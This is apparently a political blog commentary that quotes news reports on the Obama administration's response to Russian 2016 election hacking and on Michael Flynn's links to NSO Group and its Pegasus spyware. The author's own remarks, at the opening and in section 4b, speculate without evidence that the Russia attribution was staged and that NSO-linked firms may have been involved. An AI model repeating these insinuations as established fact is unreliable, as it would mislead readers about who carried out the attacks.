Keep in mind that such a response from the US would be entirely predictable if the Russian government really did order this hack. Russia would be at heightened risk for years or decades to come if Putin really did order this attack. There’s no reason to assume that the Russian government wouldn’t be well aware of this consequence.
So if Putin really did order this hack, he would have to have gone insane. That’s how stupid this attack was if Putin actually ordered it. According to a CIA spy in the Kremlin, along with a questionable foreign ally, that’s exactly what Putin did.
He apparently went insane and preemptively launched a cyberwar knowing full well how devastating the long-term consequences could be. Because he really, really, really hates Hillary. That’s the narrative we’re being given.
And now, any future attack on US elections or the US electrical grid that can somehow be pinned on the Russians is going to trigger some sort of painful wave of retaliatory cyberbombs. Which, of course, will likely trigger a wave of counter-retaliatory cyberbombs in the US. And a full-scale cyberwar will be born, and we’ll just have to hope it stays in the cyber domain. That’s where we are now, based on a CIA spy in the Kremlin and an unnamed foreign intelligence agency.
Early last August, an envelope with extraordinary handling restrictions arrived at the White House. Sent by courier from the CIA, it carried “eyes only” instructions that its contents be shown to just four people: President Barack Obama and three senior aides.
Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.
But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.
At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.
But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.
The material was so sensitive that CIA Director John Brennan kept it out of the President’s Daily Brief, concerned that even that restricted report’s distribution was too broad. The CIA package came with instructions that it be returned immediately after it was read. To guard against leaks, subsequent meetings in the Situation Room followed the same protocols as planning sessions for the Osama bin Laden raid.
It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.
Over that five-month interval, the Obama administration secretly debated dozens of options for deterring or punishing Russia, including cyberattacks on Russian infrastructure, the release of CIA-gathered material that might embarrass Putin and sanctions that officials said could “crater” the Russian economy.
But in the end, in late December, Obama approved a modest package combining measures that had been drawn up to punish Russia for other issues — expulsions of 35 diplomats and the closure of two Russian compounds — with economic sanctions so narrowly targeted that even those who helped design them describe their impact as largely symbolic.
Obama also approved a previously undisclosed covert measure that authorized planting cyber weapons in Russia’s infrastructure, the digital equivalent of bombs that could be detonated if the United States found itself in an escalating exchange with Moscow. The project, which Obama approved in a covert-action finding, was still in its planning stages when Obama left office. It would be up to President Trump to decide whether to use the capability.
In political terms, Russia’s interference was the crime of the century, an unprecedented and largely successful destabilizing attack on American democracy. It was a case that took almost no time to solve, traced to the Kremlin through cyber-forensics and intelligence on Putin’s involvement. And yet, because of the divergent ways Obama and Trump have handled the matter, Moscow appears unlikely to face proportionate consequences.
Those closest to Obama defend the administration’s response to Russia’s meddling. They note that by August it was too late to prevent the transfer to WikiLeaks and other groups of the troves of emails that would spill out in the ensuing months. They believe that a series of warnings — including one that Obama delivered to Putin in September — prompted Moscow to abandon any plans of further aggression, such as sabotage of U.S. voting systems.
Denis McDonough, who served as Obama’s chief of staff, said that the administration regarded Russia’s interference as an attack on the “heart of our system.”
“We set out from a first-order principle that required us to defend the integrity of the vote,” McDonough said in an interview. “Importantly, we did that. It’s also important to establish what happened and what they attempted to do so as to ensure that we take the steps necessary to stop it from happening again.”
But other administration officials look back on the Russia period with remorse.
“It is the hardest thing about my entire time in government to defend,” said a former senior Obama administration official involved in White House deliberations on Russia. “I feel like we sort of choked.”
…
This account of the Obama administration’s response to Russia’s interference is based on interviews with more than three dozen current and former U.S. officials in senior positions in government, including at the White House, the State, Defense and Homeland Security departments, and U.S. intelligence services. Most agreed to speak only on the condition of anonymity, citing the sensitivity of the issue.
The White House, the CIA, the FBI, the National Security Agency and the Office of the Director of National Intelligence declined to comment.
‘Deeply concerned’
The CIA breakthrough came at a stage of the presidential campaign when Trump had secured the GOP nomination but was still regarded as a distant long shot. Clinton held comfortable leads in major polls, and Obama expected that he would be transferring power to someone who had served in his Cabinet.
The intelligence on Putin was extraordinary on multiple levels, including as a feat of espionage.
For spy agencies, gaining insights into the intentions of foreign leaders is among the highest priorities. But Putin is a remarkably elusive target. A former KGB officer, he takes extreme precautions to guard against surveillance, rarely communicating by phone or computer, always running sensitive state business from deep within the confines of the Kremlin.
The Washington Post is withholding some details of the intelligence at the request of the U.S. government.
In early August, Brennan alerted senior White House officials to the Putin intelligence, making a call to deputy national security adviser Avril Haines and pulling national security adviser Susan E. Rice aside after a meeting before briefing Obama along with Rice, Haines and McDonough in the Oval Office.
Officials described the president’s reaction as grave. Obama “was deeply concerned and wanted as much information as fast as possible,” a former official said. “He wanted the entire intelligence community all over this.”
Concerns about Russian interference had gathered throughout the summer.
Russia experts had begun to see a troubling pattern of propaganda in which fictitious news stories, assumed to be generated by Moscow, proliferated across social-media platforms.
Officials at the State Department and FBI became alarmed by an unusual spike in requests from Russia for temporary visas for officials with technical skills seeking permission to enter the United States for short-term assignments at Russian facilities. At the FBI’s behest, the State Department delayed approving the visas until after the election.
Meanwhile, the FBI was tracking a flurry of hacking activity against U.S. political parties, think tanks and other targets. Russia had gained entry to DNC systems in the summer of 2015 and spring of 2016, but the breaches did not become public until they were disclosed in a June 2016 report by The Post.
Even after the late-July WikiLeaks dump, which came on the eve of the Democratic convention and led to the resignation of Rep. Debbie Wasserman Schultz (D‑Fla.) as the DNC’s chairwoman, U.S. intelligence officials continued to express uncertainty about who was behind the hacks or why they were carried out.
At a public security conference in Aspen, Colo., in late July, Director of National Intelligence James R. Clapper Jr. noted that Russia had a long history of meddling in American elections but that U.S. spy agencies were not ready to “make the call on attribution” for what was happening in 2016.
“We don’t know enough … to ascribe motivation,” Clapper said. “Was this just to stir up trouble or was this ultimately to try to influence an election?”
Brennan convened a secret task force at CIA headquarters composed of several dozen analysts and officers from the CIA, the NSA and the FBI.
The unit functioned as a sealed compartment, its work hidden from the rest of the intelligence community. Those brought in signed new non-disclosure agreements to be granted access to intelligence from all three participating agencies.
They worked exclusively for two groups of “customers,” officials said. The first was Obama and fewer than 14 senior officials in government. The second was a team of operations specialists at the CIA, NSA and FBI who took direction from the task force on where to aim their subsequent efforts to collect more intelligence on Russia.
Don’t make things worse
The secrecy extended into the White House.
Rice, Haines and White House homeland-security adviser Lisa Monaco convened meetings in the Situation Room to weigh the mounting evidence of Russian interference and generate options for how to respond. At first, only four senior security officials were allowed to attend: Brennan, Clapper, Attorney General Loretta E. Lynch and FBI Director James B. Comey. Aides ordinarily allowed entry as “plus-ones” were barred.
Gradually, the circle widened to include Vice President Biden and others. Agendas sent to Cabinet secretaries — including John F. Kerry at the State Department and Ashton B. Carter at the Pentagon — arrived in envelopes that subordinates were not supposed to open. Sometimes the agendas were withheld until participants had taken their seats in the Situation Room.
Throughout his presidency, Obama’s approach to national security challenges was deliberate and cautious. He came into office seeking to end wars in Iraq and Afghanistan. He was loath to act without support from allies overseas and firm political footing at home. He was drawn only reluctantly into foreign crises, such as the civil war in Syria, that presented no clear exit for the United States.
Obama’s approach often seemed reducible to a single imperative: Don’t make things worse. As brazen as the Russian attacks on the election seemed, Obama and his top advisers feared that things could get far worse.
They were concerned that any pre-election response could provoke an escalation from Putin. Moscow’s meddling to that point was seen as deeply concerning but unlikely to materially affect the outcome of the election. Far more worrisome to the Obama team was the prospect of a cyber-assault on voting systems before and on Election Day.
They also worried that any action they took would be perceived as political interference in an already volatile campaign. By August, Trump was predicting that the election would be rigged. Obama officials feared providing fuel to such claims, playing into Russia’s efforts to discredit the outcome and potentially contaminating the expected Clinton triumph.
Before departing for an August vacation to Martha’s Vineyard, Obama instructed aides to pursue ways to deter Moscow and proceed along three main paths: Get a high-confidence assessment from U.S. intelligence agencies on Russia’s role and intent; shore up any vulnerabilities in state-run election systems; and seek bipartisan support from congressional leaders for a statement condemning Moscow and urging states to accept federal help.
The administration encountered obstacles at every turn.
Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”
Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.
Brennan moved swiftly to schedule private briefings with congressional leaders. But getting appointments with certain Republicans proved difficult, officials said, and it was not until after Labor Day that Brennan had reached all members of the “Gang of Eight” — the majority and minority leaders of both houses and the chairmen and ranking Democrats on the Senate and House intelligence committees.
Jeh Johnson, the homeland-security secretary, was responsible for finding out whether the government could quickly shore up the security of the nation’s archaic patchwork of voting systems. He floated the idea of designating state mechanisms “critical infrastructure,” a label that would have entitled states to receive priority in federal cybersecurity assistance, putting them on a par with U.S. defense contractors and financial networks.
On Aug. 15, Johnson arranged a conference call with dozens of state officials, hoping to enlist their support. He ran into a wall of resistance.
The reaction “ranged from neutral to negative,” Johnson said in congressional testimony Wednesday.
Brian Kemp, the Republican secretary of state of Georgia, used the call to denounce Johnson’s proposal as an assault on state rights. “I think it was a politically calculated move by the previous administration,” Kemp said in a recent interview, adding that he remains unconvinced that Russia waged a campaign to disrupt the 2016 race. “I don’t necessarily believe that,” he said.
Stung by the reaction, the White House turned to Congress for help, hoping that a bipartisan appeal to states would be more effective.
In early September, Johnson, Comey and Monaco arrived on Capitol Hill in a caravan of black SUVs for a meeting with 12 key members of Congress, including the leadership of both parties.
The meeting devolved into a partisan squabble.
“The Dems were, ‘Hey, we have to tell the public,’” recalled one participant. But Republicans resisted, arguing that to warn the public that the election was under attack would further Russia’s aim of sapping confidence in the system.
Senate Majority Leader Mitch McConnell (R‑Ky.) went further, officials said, voicing skepticism that the underlying intelligence truly supported the White House’s claims. Through a spokeswoman, McConnell declined to comment, citing the secrecy of that meeting.
Key Democrats were stunned by the GOP response and exasperated that the White House seemed willing to let Republican opposition block any pre-election move.
On Sept. 22, two California Democrats — Sen. Dianne Feinstein and Rep. Adam B. Schiff — did what they couldn’t get the White House to do. They issued a statement making clear that they had learned from intelligence briefings that Russia was directing a campaign to undermine the election, but they stopped short of saying to what end.
A week later, McConnell and other congressional leaders issued a cautious statement that encouraged state election officials to ensure their networks were “secure from attack.” The release made no mention of Russia and emphasized that the lawmakers “would oppose any effort by the federal government” to encroach on the states’ authorities.
When U.S. spy agencies reached unanimous agreement in late September that the interference was a Russian operation directed by Putin, Obama directed spy chiefs to prepare a public statement summarizing the intelligence in broad strokes.
With Obama still determined to avoid any appearance of politics, the statement would not carry his signature.
On Oct. 7, the administration offered its first public comment on Russia’s “active measures,” in a three-paragraph statement issued by Johnson and Clapper. Comey had initially agreed to attach his name, as well, officials said, but changed his mind at the last minute, saying that it was too close to the election for the bureau to be involved.
“The U.S. intelligence community is confident that the Russian government directed the recent compromises of e‑mails from U.S. persons and institutions, including from U.S. political organizations,” the statement said. “We believe, based on the scope and sensitivity of these efforts, that only Russia’s senior-most officials could have authorized these activities.”
Early drafts accused Putin by name, but the reference was removed out of concern that it might endanger intelligence sources and methods.
The statement was issued around 3:30 p.m., timed for maximum media coverage. Instead, it was quickly drowned out. At 4 p.m., The Post published a story about crude comments Trump had made about women that were captured on an “Access Hollywood” tape. Half an hour later, WikiLeaks published its first batch of emails stolen from Clinton campaign chairman John Podesta.
…
‘Ample time’ after election
The Situation Room is actually a complex of secure spaces in the basement level of the West Wing. A video feed from the main room courses through some National Security Council offices, allowing senior aides sitting at their desks to see — but not hear — when meetings are underway.
As the Russia-related sessions with Cabinet members began in August, the video feed was shut off. The last time that had happened on a sustained basis, officials said, was in the spring of 2011 during the run-up to the U.S. Special Operations raid on bin Laden’s compound in Pakistan.
The blacked-out screens were seen as an ominous sign among lower-level White House officials who were largely kept in the dark about the Russia deliberations even as they were tasked with generating options for retaliation against Moscow.
Much of that work was led by the Cyber Response Group, an NSC unit with representatives from the CIA, NSA, State Department and Pentagon.
The early options they discussed were ambitious. They looked at sectorwide economic sanctions and cyberattacks that would take Russian networks temporarily offline. One official informally suggested — though never formally proposed — moving a U.S. naval carrier group into the Baltic Sea as a symbol of resolve.
What those lower-level officials did not know was that the principals and their deputies had by late September all but ruled out any pre-election retaliation against Moscow. They feared that any action would be seen as political and that Putin, motivated by a seething resentment of Clinton, was prepared to go beyond fake news and email dumps.
The FBI had detected suspected Russian attempts to penetrate election systems in 21 states, and at least one senior White House official assumed that Moscow would try all 50, officials said. Some officials believed the attempts were meant to be detected to unnerve the Americans. The patchwork nature of the United States’ 3,000 or so voting jurisdictions would make it hard for Russia to swing the outcome, but Moscow could still sow chaos.
“We turned to other scenarios” the Russians might attempt, said Michael Daniel, who was cybersecurity coordinator at the White House, “such as disrupting the voter rolls, deleting every 10th voter [from registries] or flipping two digits in everybody’s address.”
The White House also worried that they had not yet seen the worst of Russia’s campaign. WikiLeaks and DCLeaks, a website set up in June 2016 by hackers believed to be Russian operatives, already had troves of emails. But U.S. officials feared that Russia had more explosive material or was willing to fabricate it.
“Our primary interest in August, September and October was to prevent them from doing the max they could do,” said a senior administration official. “We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures.”
The assumption that Clinton would win contributed to the lack of urgency.
Instead, the administration issued a series of warnings.
Brennan delivered the first on Aug. 4 in a blunt phone call with Alexander Bortnikov, the director of the FSB, Russia’s powerful security service.
A month later, Obama confronted Putin directly during a meeting of world leaders in Hangzhou, China. Accompanied only by interpreters, Obama told Putin that “we knew what he was doing and [he] better stop or else,” according to a senior aide who subsequently spoke with Obama. Putin responded by demanding proof and accusing the United States of interfering in Russia’s internal affairs.
In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.”
There were at least two other warnings.
On Oct. 7, the day that the Clapper-Johnson statement was released, Rice summoned Russian Ambassador Sergey Kislyak to the White House and handed him a message to relay to Putin.
Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation.
As Election Day approached, proponents of taking action against Russia made final, futile appeals to Obama’s top aides: McDonough, Rice and Haines. Because their offices were part of a suite of spaces in the West Wing, securing their support on any national security issue came to be known as “moving the suite.”
One of the last to try before the election was Kerry. Often perceived as reluctant to confront Russia, in part to preserve his attempts to negotiate a Syria peace deal, Kerry was at critical moments one of the leading hawks.
In October, Kerry’s top aides had produced an “action memo” that included a package of retaliatory measures including economic sanctions. Knowing the White House was not willing to act before the election, the plan called for the measures to be announced almost immediately after votes had been securely cast and counted.
Kerry signed the memo and urged the White House to convene a principals meeting to discuss the plan, officials said. “The response was basically, ‘Not now,’” one official said.
Election Day arrived without penalty for Moscow.
…
A U.S. cyber-weapon
The most difficult measure to evaluate is one that Obama alluded to in only the most oblique fashion when announcing the U.S. response.
“We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicized,” he said in a statement released by the White House.
He was referring, in part, to a cyber operation that was designed to be detected by Moscow but not cause significant damage, officials said. The operation, which entailed implanting computer code in sensitive computer systems that Russia was bound to find, served only as a reminder to Moscow of the United States’ cyber reach.
But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.
Obama declined to comment for this article, but a spokesman issued a statement: “This situation was taken extremely seriously, as is evident by President Obama raising this issue directly with President Putin; 17 intelligence agencies issuing an extraordinary public statement; our homeland security officials working relentlessly to bolster the cyber defenses of voting infrastructure around the country; the President directing a comprehensive intelligence review, and ultimately issuing a robust response including shutting down two Russian compounds, sanctioning nine Russian entities and individuals, and ejecting 35 Russian diplomats from the country.”
The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.
The implants were developed by the NSA and designed so that they could be triggered remotely as part of a retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.
Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.
As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.
The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.
U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.
———-
4a. Well, look at that: investigators are exploring the more than three dozen companies and individuals that Michael Flynn worked for, as a consultant, adviser, board member or speaker, while advising the Trump campaign last year, and two of those entities are raising some extra eyebrows. Flynn was an advisory board member of Luxembourg-based OSY Technologies and consulted for the US-based private equity firm Francisco Partners. What’s so questionable about these entities? Well, Francisco Partners owns NSO Group, a secretive Israel-based cyberweapons dealer that sells advanced hacking tools to governments around the world, and OSY Technologies is an NSO Group offshoot. Flynn joined OSY in May of last year. Yep, Michael Flynn worked for both the owner of an advanced cyberweapons dealer and one of its offshoots throughout the 2016 campaign.
“The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.”
Yep, not only was Flynn working for NSO Group’s OSY Technologies and its owners at Francisco Partners, but NSO Group was also initiating plans to get more US government contracts…something that would presumably be much likelier to happen if Donald Trump won the White House and brought Flynn into the government.
And note how NSO Group wasn’t the only cybersecurity firm Flynn was working for:
“ . . . .When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.
Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”) . . .”
…
In terms of assessing the significance of these business relationships, on the one hand, cybersecurity is one of the areas where one should expect the former head of the US Defense Intelligence Agency to go into after leaving government. On the other hand, we have just been told about the most hack-intensive US campaign in history and all the hacking was done in favor of Donald Trump. It is difficult to shake the notion that one or more of these firms may have been involved in one of the high-profile hacks.
Due to the relative lack of sophistication required to carry out a spear-phishing attack – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – it really is the case that almost anyone with adequate hacking skills could have pulled these hacks off, hidden their tracks, and made it look like ‘the Russians’ did it. And NSO Group’s software specializes in creating spear-phishing campaigns designed to trick people into clicking on malicious links, using a variety of different tricks, and then inserting spying malware into the victims’ systems:
While serving as a top campaign aide to Donald Trump, former national security adviser Michael Flynn made tens of thousands of dollars on the side advising a company that sold surveillance technology that repressive governments used to monitor activists and journalists.
Flynn, who resigned in February after mischaracterizing his conversations with the Russian ambassador to the U.S., has already come under scrutiny for taking money from foreign outfits. Federal investigators began probing Flynn’s lobbying efforts on behalf of a Dutch company led by a businessman with ties to the Turkish government earlier this year. Flynn’s moonlighting wasn’t typical: Most people at the top level of major presidential campaigns do not simultaneously lobby for any entity, especially not foreign governments. It’s also unusual for former U.S. intelligence officials to work with foreign cybersecurity outfits.
Nor was Flynn’s work with foreign entities while he was advising Trump limited to his Ankara deal. He earned nearly $1.5 million last year as a consultant, adviser, board member, or speaker for more than three dozen companies and individuals, according to financial disclosure forms released earlier this year.
Two of those entities are directly linked to NSO Group, a secretive Israeli cyberweapons dealer founded by Omri Lavie and Shalev Hulio, who are rumored to have served in Unit 8200, the Israeli equivalent of the National Security Agency.
Flynn received $40,280 last year as an advisory board member for OSY Technologies, an NSO Group offshoot based in Luxembourg, a favorite tax haven for major corporations. OSY Technologies is part of a corporate structure that runs from Israel, where NSO Group is located, through Luxembourg, the Cayman Islands, the British Virgin Islands, and the U.S.
Flynn also worked as a consultant last year for Francisco Partners, a U.S.-based private equity firm that owns NSO Group, but he did not disclose how much he was paid. At least two Francisco Partners executives have sat on OSY’s board.
Flynn’s financial disclosure forms do not specify the work he did for companies linked to NSO Group, and his lawyer did not respond to requests for comment. Former colleagues at Flynn’s consulting firm declined to discuss Flynn’s work with NSO Group. Executives at Francisco Partners who also sit on the OSY Technologies board did not respond to emails. Lavie, the NSO Group co-founder, told HuffPost he is “not interested in speaking to the press” and referred questions to a spokesman, who did not respond to queries.
Many government and military officials have moved through the revolving door between government agencies and private cybersecurity companies. The major players in the cybersecurity contracting world – SAIC, Booz Allen Hamilton, CACI Federal and KeyW Corporation – all have former top government officials in leadership roles or on their boards, or have former top executives working in government.
But it’s less common for former U.S. intelligence officials to work with foreign cybersecurity outfits. “There is a lot of opportunity in the U.S. to do this kind of work,” said Ben Johnson, a former NSA employee and the co-founder of Obsidian Security. “It’s a little bit unexpected going overseas, especially when you combine that with the fact that they’re doing things that might end up in hands of enemies of the U.S. government. It does seem questionable.”
What is clear is that during the time Flynn was working for NSO’s Luxembourg affiliate, one of the company’s main products — a spy software sold exclusively to governments and marketed as a tool for law enforcement officials to monitor suspected criminals and terrorists — was being used to surveil political dissidents, reporters, activists, and government officials. The software, called Pegasus, allowed users to remotely break into a target’s cellular phone if the target responded to a text message.
Last year, several people targeted by the spyware contacted Citizen Lab, a cybersecurity research team based out of the University of Toronto. With the help of experts at the computer security firm Lookout, Citizen Lab researchers were able to trace the spyware hidden in the texts back to NSO Group spyware. After Citizen Lab publicized its findings, Apple introduced patches to fix the vulnerability. It is not known how many activists in other countries were targeted and failed to report it to experts.
NSO Group told Forbes in a statement last year that it complies with strict export control laws and only sells to authorized government agencies. “The company does NOT operate any of its systems; it is strictly a technology company,” NSO Group told Forbes.
But once a sale is complete, foreign governments are free to do what they like with the technology.
“The government buys [the technology] and can use it however they want,” Bill Marczak, one of the Citizen Lab researchers, told HuffPost. “They’re basically digital arms merchants.”
The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.
“When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.
Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)
Prominent human rights activists and political dissidents have reported being targeted by NSO’s technology. On August 10, 2016, Ahmed Mansoor, an internationally recognized Emirati human rights activist, received a text message prompting him to click a link to read “new secrets” about detainees abused in UAE prisons. He got a similar text the next day. But Mansoor, who had already been repeatedly targeted by hackers, knew better than to click the links. Instead, he forwarded the messages to Citizen Lab.
Citizen Lab soon determined that NSO Group’s malware exploited an undisclosed mobile phone vulnerability, known as a zero-day exploit, that enabled its customers – that is, foreign governments – to surveil a target’s phone after the target clicked the link included in the phishing text message. If Mansoor had clicked that link, his “phone would have become a digital spy in his pocket, capable of employing his phone camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements,” Citizen Lab wrote in a report.
Across the globe in Mexico, where Coca-Cola and PepsiCo were working to repeal a tax on sodas imposed in 2014, two activists and a government-employed scientist, all of whom supported the soda tax, received a series of suspicious text messages. The texts, which became increasingly aggressive and threatening, came as the scientist and the activists were preparing a public relations campaign in support of raising the soda tax and promoting awareness of the health risks linked to sugary beverages.
Dr. Simón Barquera, researcher at Mexico’s National Institute for Public Health, received a text on July 11, 2016, inviting him to click a link the sender said would lead him to a detailed investigation of his clinic. When Barquera didn’t follow through, the texts escalated. On the 12th, he got a text with a link to a purported court document, which the sender claimed mentioned Barquera by name. On the 13th, yet another text included a link that supposedly contained information about a funeral. The day after that, the sender wrote, “You are an asshole Simon, while you are working I’m fuc king your old lady here is a photo.” The final text Barquera received in August said that his daughter was in “grave condition” after an accident, and included a link that would supposedly tell him where she was being treated.
Alejandro Calvillo, director of the consumer rights nonprofit El Poder del Consumidor, received a text with a link claiming to be from a man who wanted to know if Calvillo could attend the man’s father’s funeral. Another text sent to Calvillo included a link that the sender said was a viral news story that mentioned him. The final target, Luis Encarnación, a coordinator for the obesity prevention group Coalicion ContraPESO, also received a text with a link claiming that he was named in a news article.
The targets quickly got in touch with Citizen Lab and forwarded their text messages to the researchers. In February 2017, Citizen Lab released a new report linking NSO Group’s technology to the phishing attempts targeting the pro-soda tax campaigners.
Citizen Lab researchers have also identified texts sent last summer to Mexican journalist Rafael Cabrera that they believe were an attempt to infect his phone with NSO Group’s Pegasus spyware. Cabrera, who now works for BuzzFeed Mexico, was targeted by hackers after he broke a story revealing a potential conflict of interest with the Mexican first family and a Chinese company.
Citizen Lab believes NSO Group may have also sold its mobile phone spying technology to many governments, including those of Kenya, Mozambique, Yemen, Qatar, Turkey, Saudi Arabia, Uzbekistan, Thailand, Morocco, Hungary, Nigeria and Bahrain.
Working with repressive regimes is standard practice in the cyberweapons industry. The Italian surveillance malware firm Hacking Team has worked with dozens of countries known to jail dissidents, according to emails uploaded to WikiLeaks. The FBI and the Drug Enforcement Agency were among the company’s customers, according to the documents.
Despite recent scrutiny over Mansoor’s case, NSO Group’s value has exploded in recent years. Francisco Partners bought the cyberweapons dealer in 2014 for $120 million. It is now reportedly valued at over $1 billion. . . .
4b. Due to the relative lack of sophistication required to carry out a spear-phishing attack – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – almost anyone with adequate hacking skills could have pulled these hacks off, hiding their tracks and making it appear as though “the Russians” did it. NSO Group’s software specializes in creating spear-phishing campaigns designed to trick people into clicking on malicious links, using a variety of different tricks, and then inserting spying malware into the victims’ systems. Their spear-phishing methodology is sophisticated.
“. . . . Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures. . . .”
Note how even when a phone is known to be hacked by someone using the NSO Group malware after a successful spear-phishing attempt, there’s still no way to know which NSO Group client did it. Even NSO Group claims it can’t determine who did it:
“. . . . The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.
Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.
But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.
‘This is pretty much as good as it gets,’ said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.
Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed. . . .”
Yet for the DNC/Podesta hacks, which were also spear-phishing campaigns but against targets with a wide variety of potential enemies across the globe, the primary evidence we’re given that the Russian government was really behind the hacks was the amazingly sloppy hacker ‘mistakes’: Cyrillic characters in the hacked documents’ metadata, and leaving the Bitly accounts used to create the links in the spear-phishing emails public, so that cybersecurity researchers could watch the hacking campaign’s entire list of targets. In other words, ‘evidence’ that could easily have been left to be found.
All of this adds to the mystery of Michael Flynn and the potential role he played in the Trump campaign: The former head of the US military’s spy agency worked for a company that makes advanced software designed to first conduct a successful spear-phishing campaign and then deliver NSO Group’s special spying malware to the victim, the same kind of campaign that attacked the DNC, John Podesta, and the 39 state election systems.
Yet almost no one seems to raise the question as to whether or not Flynn and his deep ties to the hacking world could have had anything to do with those high-profile hacks. Only consideration of Russian hackers is allowed. It’s a pretty mysterious mystery, although perhaps not as mysterious as the investigation.
Mexico’s most prominent human rights lawyers, journalists and anti-corruption activists have been targeted by advanced spyware sold to the Mexican government on the condition that it be used only to investigate criminals and terrorists.
The targets include lawyers looking into the mass disappearance of 43 students, a highly respected academic who helped write anti-corruption legislation, two of Mexico’s most influential journalists and an American representing victims of sexual abuse by the police. The spying even swept up family members, including a teenage boy.
Since 2011, at least three Mexican federal agencies have purchased about $80 million worth of spyware created by an Israeli cyberarms manufacturer. The software, known as Pegasus, infiltrates smartphones to monitor every detail of a person’s cellular life — calls, texts, email, contacts and calendars. It can even use the microphone and camera on phones for surveillance, turning a target’s smartphone into a personal bug.
The company that makes the software, the NSO Group, says it sells the tool exclusively to governments, with an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans.
But according to dozens of messages examined by The New York Times and independent forensic analysts, the software has been used against some of the government’s most outspoken critics and their families, in what many view as an unprecedented effort to thwart the fight against the corruption infecting every limb of Mexican society.
